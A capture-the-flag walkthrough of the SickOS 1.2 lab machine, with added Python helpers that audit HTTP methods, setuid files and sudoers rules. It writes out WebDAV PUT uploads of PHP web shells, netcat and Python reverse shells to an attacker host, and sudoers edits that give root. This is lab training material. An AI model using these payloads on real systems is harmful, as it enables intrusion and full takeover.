SickOS 1.2 -- Walkthrough
Nmap scan report for 192.168.0.105
Host is up (0.0089s latency).
MAC Address: AA:AA:AA:AA:AA:AA (Unknown)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
From the website we have an image and nothing else.
No info in source code
No info from Dirb
Nothing from Nikto
Hmm, so let's take a look at the image more closely...
-- identify -verbose 1.jpg
Nothing interesting in here...
So now let's look at the directory listing under 'Test'.
We can use curl to tell us which HTTP methods the server allows, which we may not have found directly
from the nmap -A scan.
user@logikz: curl -X OPTIONS http://192.168.0.105/test -v
* Trying 192.168.0.105...
* TCP_NODELAY set
* Connected to 192.168.0.105 (192.168.0.105) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.0.105
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.0.105/test/
< Content-Length: 0
< Date: Sun, 19 Nov 2017 18:18:26 GMT
< Server: lighttpd/1.4.28
<
* Curl_http_done: called premature == 0
* Connection #0 to host 192.168.0.105 left intact
We can see that the PUT method is allowed. This means we should be able to place a file on the server.
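As an added example (not part of the original walkthrough), here is a small audit helper that parses the Allow header of an OPTIONS response, as captured above, and reports which methods let a client modify server content; the sample response is constructed from the curl output above.

```python
# Added example: parse the Allow header of an HTTP OPTIONS response and flag
# WebDAV/HTTP methods that let a client create, change or delete resources.
# SAMPLE_RESPONSE is constructed from the curl output in the walkthrough.

# Methods that write to the server (WebDAV write set plus PUT/DELETE).
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}

SAMPLE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "DAV: 1,2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK\r\n"
    "Location: http://192.168.0.105/test/\r\n"
    "Content-Length: 0\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
)

def parse_headers(raw):
    """Return {lower-cased header name: value} from a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def allowed_methods(raw):
    """Methods listed in the Allow header, upper-cased, in server order."""
    allow = parse_headers(raw).get("allow", "")
    return [m.strip().upper() for m in allow.split(",") if m.strip()]

def audit_options(raw):
    """Summarise what the OPTIONS response exposes: DAV, server banner, write methods."""
    headers = parse_headers(raw)
    writable = sorted(m for m in allowed_methods(raw) if m in WRITE_METHODS)
    return {
        "dav_enabled": "dav" in headers,
        "server": headers.get("server", ""),
        "write_methods": writable,
        # PUT alone is enough to drop arbitrary files, so it is rated highest.
        "risk": "high" if "PUT" in writable else ("medium" if writable else "low"),
    }

if __name__ == "__main__":
    print(audit_options(SAMPLE_RESPONSE))
```

On lighttpd the fix for this finding is to keep mod_webdav read-only (`webdav.is-readonly = "enable"`) or not to enable the module on a public path at all.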
curl -X PUT http://192.168.0.105/test/python-backdoor-2.py --upload-file python-backdoor-2.py
This failed.
Let's try adding our own code directly into a file, like so:
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.0.105/test/shell.php
Now we can execute system commands using the "cmd" parameter.
Alternatively we can just execute a single command:
curl -v -X PUT -d '<?php echo shell_exec("whoami"); ?>' http://192.168.0.105/test/shell3.php
curl -v -X PUT -d '<?php echo shell_exec("cat /etc/passwd"); ?>' http://192.168.0.105/test/shell3.php
This gives us the following...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
So we have a user account called "john".
Now let's see if we can create a reverse shell.
curl -v -X PUT -d '<?php echo shell_exec("/bin/nc 192.168.0.100 8484"); ?>' http://192.168.0.105/test/nc.php
Didn't work...
Try this:
curl -v -X PUT -d '<?php echo `whoami`; ?>' http://192.168.0.105/test/whoami.php
We can also run commands ourselves, like so, using the 'cmd' parameter:
curl -v -X PUT -d '<?php passthru($_GET["cmd"]); ?>' http://192.168.0.105/test/cmd.php
http://192.168.0.105/test/cmd.php?cmd=mkfifo /tmp/mkbkikk; /bin/nc 192.168.0.100 8989 0%3C/tmp/mkbkikk | /bin/sh %3E/tmp/mkbkikk 2%3E&1; rm /tmp/mkbkikk
Nope, doesn't work...
Next I try to see what ports are open locally on the machine.
Usually I can do this by piping the output through 'tee' to a file, then reading the file.
http://192.168.0.105/test/cmd.php?cmd=/bin/nc%20-z%20-v%20192.168.0.105%201-100%20|&%20/usr/bin/tee%20test.txt
This works on my PC but not on the box :-(
ARRR!!!
Eventually the answer was found:
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Whilst waiting for a connection with:
sudo nc -l -p 443 -v
$
Next we move the Python backdoor onto the server like so. We can use nc through the existing nc on a different port, 8889.
awer@logikz:/opt/enumeration sudo nc -v -w 40 -p 443 -l < python-backdoor-2.py
[sudo] password for awer:
listening on [any] 443 ...
192.168.0.105: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.105] 41808
$ nc -v -w 10 192.168.0.100 443 > python-backdoor-2.py
Connection to 192.168.0.100 443 port [tcp/https] succeeded!
We can upload the pentest monkey backdoor and get a shell, but this doesn't give us a TTY shell so is of no use.
We look at the SUID bits:
$ find / -perm -u=s -type f -ls 2>/dev/null
667707 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
667843 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
786948 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
1055122 244 -rwsr-xr-x 1 root root 248056 Jan 13 2016 /usr/lib/openssh/ssh-keysign
668412 12 -rwsr-xr-x 1 root root 9728 Feb 16 2016 /usr/lib/pt_chown
668120 12 -r-sr-xr-x 1 root root 9532 Mar 30 2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
668337 16 -r-sr-xr-x 1 root root 14320 Mar 30 2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
1182917 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudoedit
667308 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudo
659044 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
659043 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
659041 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
667072 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
667649 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
659047 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
658916 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
1179695 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
1179715 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
1182983 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
1179696 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
1179714 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
1179689 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
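As an added example (not part of the original walkthrough), this parses `find -ls` output like the listing above and diffs it against a known-good baseline, which is how a host audit catches a setuid binary that should not be there; the sample lines are taken from the listing above and the baseline is constructed for the example (in practice it comes from a clean install of the same image).

```python
# Added example: parse `find / -perm -u=s -type f -ls` output into records and
# report setuid files that are missing from a known-good baseline.
# SAMPLE_FIND_OUTPUT is a subset of the walkthrough listing; BASELINE is constructed.
import re

SAMPLE_FIND_OUTPUT = """\
667707 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
667843 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudo
659043 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
1179689 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
668120 12 -r-sr-xr-x 1 root root 9532 Mar 30 2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
"""

# Constructed baseline of setuid files expected on this build.
BASELINE = {"/usr/sbin/pppd", "/usr/sbin/uuidd", "/usr/bin/sudo", "/usr/bin/passwd", "/bin/su"}

# Fields: inode blocks mode links owner group size month day year-or-time path
LS_LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>\S+)\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)

def parse_find_ls(text):
    """Return one dict per parseable `find -ls` line."""
    records = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        mode = m.group("mode")
        records.append({
            "path": m.group("path"),
            "owner": m.group("owner"),
            "group": m.group("group"),
            "setuid": mode[3] in "sS",   # 's' in the owner-execute slot
            "setgid": mode[6] in "sS",   # 's' in the group-execute slot
        })
    return records

def unexpected_setuid(text, baseline):
    """Setuid paths that are not in the known-good baseline."""
    return sorted(r["path"] for r in parse_find_ls(text)
                  if r["setuid"] and r["path"] not in baseline)

def setuid_root(text):
    """Setuid files owned by root, the ones that deserve the closest review."""
    return sorted(r["path"] for r in parse_find_ls(text)
                  if r["setuid"] and r["owner"] == "root")
```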
Check what services are running:
service --status-all
Only ssh service is running.
We try to brute force the user 'john'.
Let's change into a TTY shell:
python -c 'import pty; pty.spawn("/bin/bash")'
#TESTING#
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/root.py" "chmod 777 /tmp/root.py" "chown root:root /tmp/root.py" > update
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "chmod 777 /etc/sudoers" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/test-1.sh" "chmod 777 /tmp/test-1.sh" "chown root:root /tmp/test-1.sh" "chmod 440 /etc/sudoers" > update
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
http://192.168.0.105/test/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Finally we decide to add the www-data user to the sudoers file.
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Then a simple 'sudo su'
and we have r00t.
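As an added example (not part of the original walkthrough), this small sudoers auditor flags the kind of entries the scripts above append ("john ALL=(ALL:ALL) ALL", "www-data ALL=NOPASSWD: ALL"); the sample sudoers content is constructed, and SERVICE_ACCOUNTS is an example list of accounts that should never hold sudo rights.

```python
# Added example: parse sudoers user-specification lines and flag rules that grant
# sudo to a service account or grant ALL without a password.
# SAMPLE_SUDOERS and SERVICE_ACCOUNTS are constructed for this example.
import re

SAMPLE_SUDOERS = """\
Defaults env_reset
# comment line
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
john ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD: ALL
"""

SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon", "backup", "messagebus"}

# user  hosts = (runas) TAG: commands    (runas and tags are optional)
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Return one dict per user-specification line; Defaults and comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if m:
            rules.append({
                "user": m.group("user"),
                "runas": m.group("runas") or "",
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "cmds": m.group("cmds").strip(),
            })
    return rules

def risky_rules(text, service_accounts):
    """List (user, reasons) for rules a reviewer should question."""
    findings = []
    for r in parse_sudoers(text):
        reasons = []
        if r["user"].lstrip("%") in service_accounts:
            reasons.append("service account")
        if r["nopasswd"] and r["cmds"] == "ALL":
            reasons.append("NOPASSWD for ALL")
        if reasons:
            findings.append((r["user"], reasons))
    return findings
```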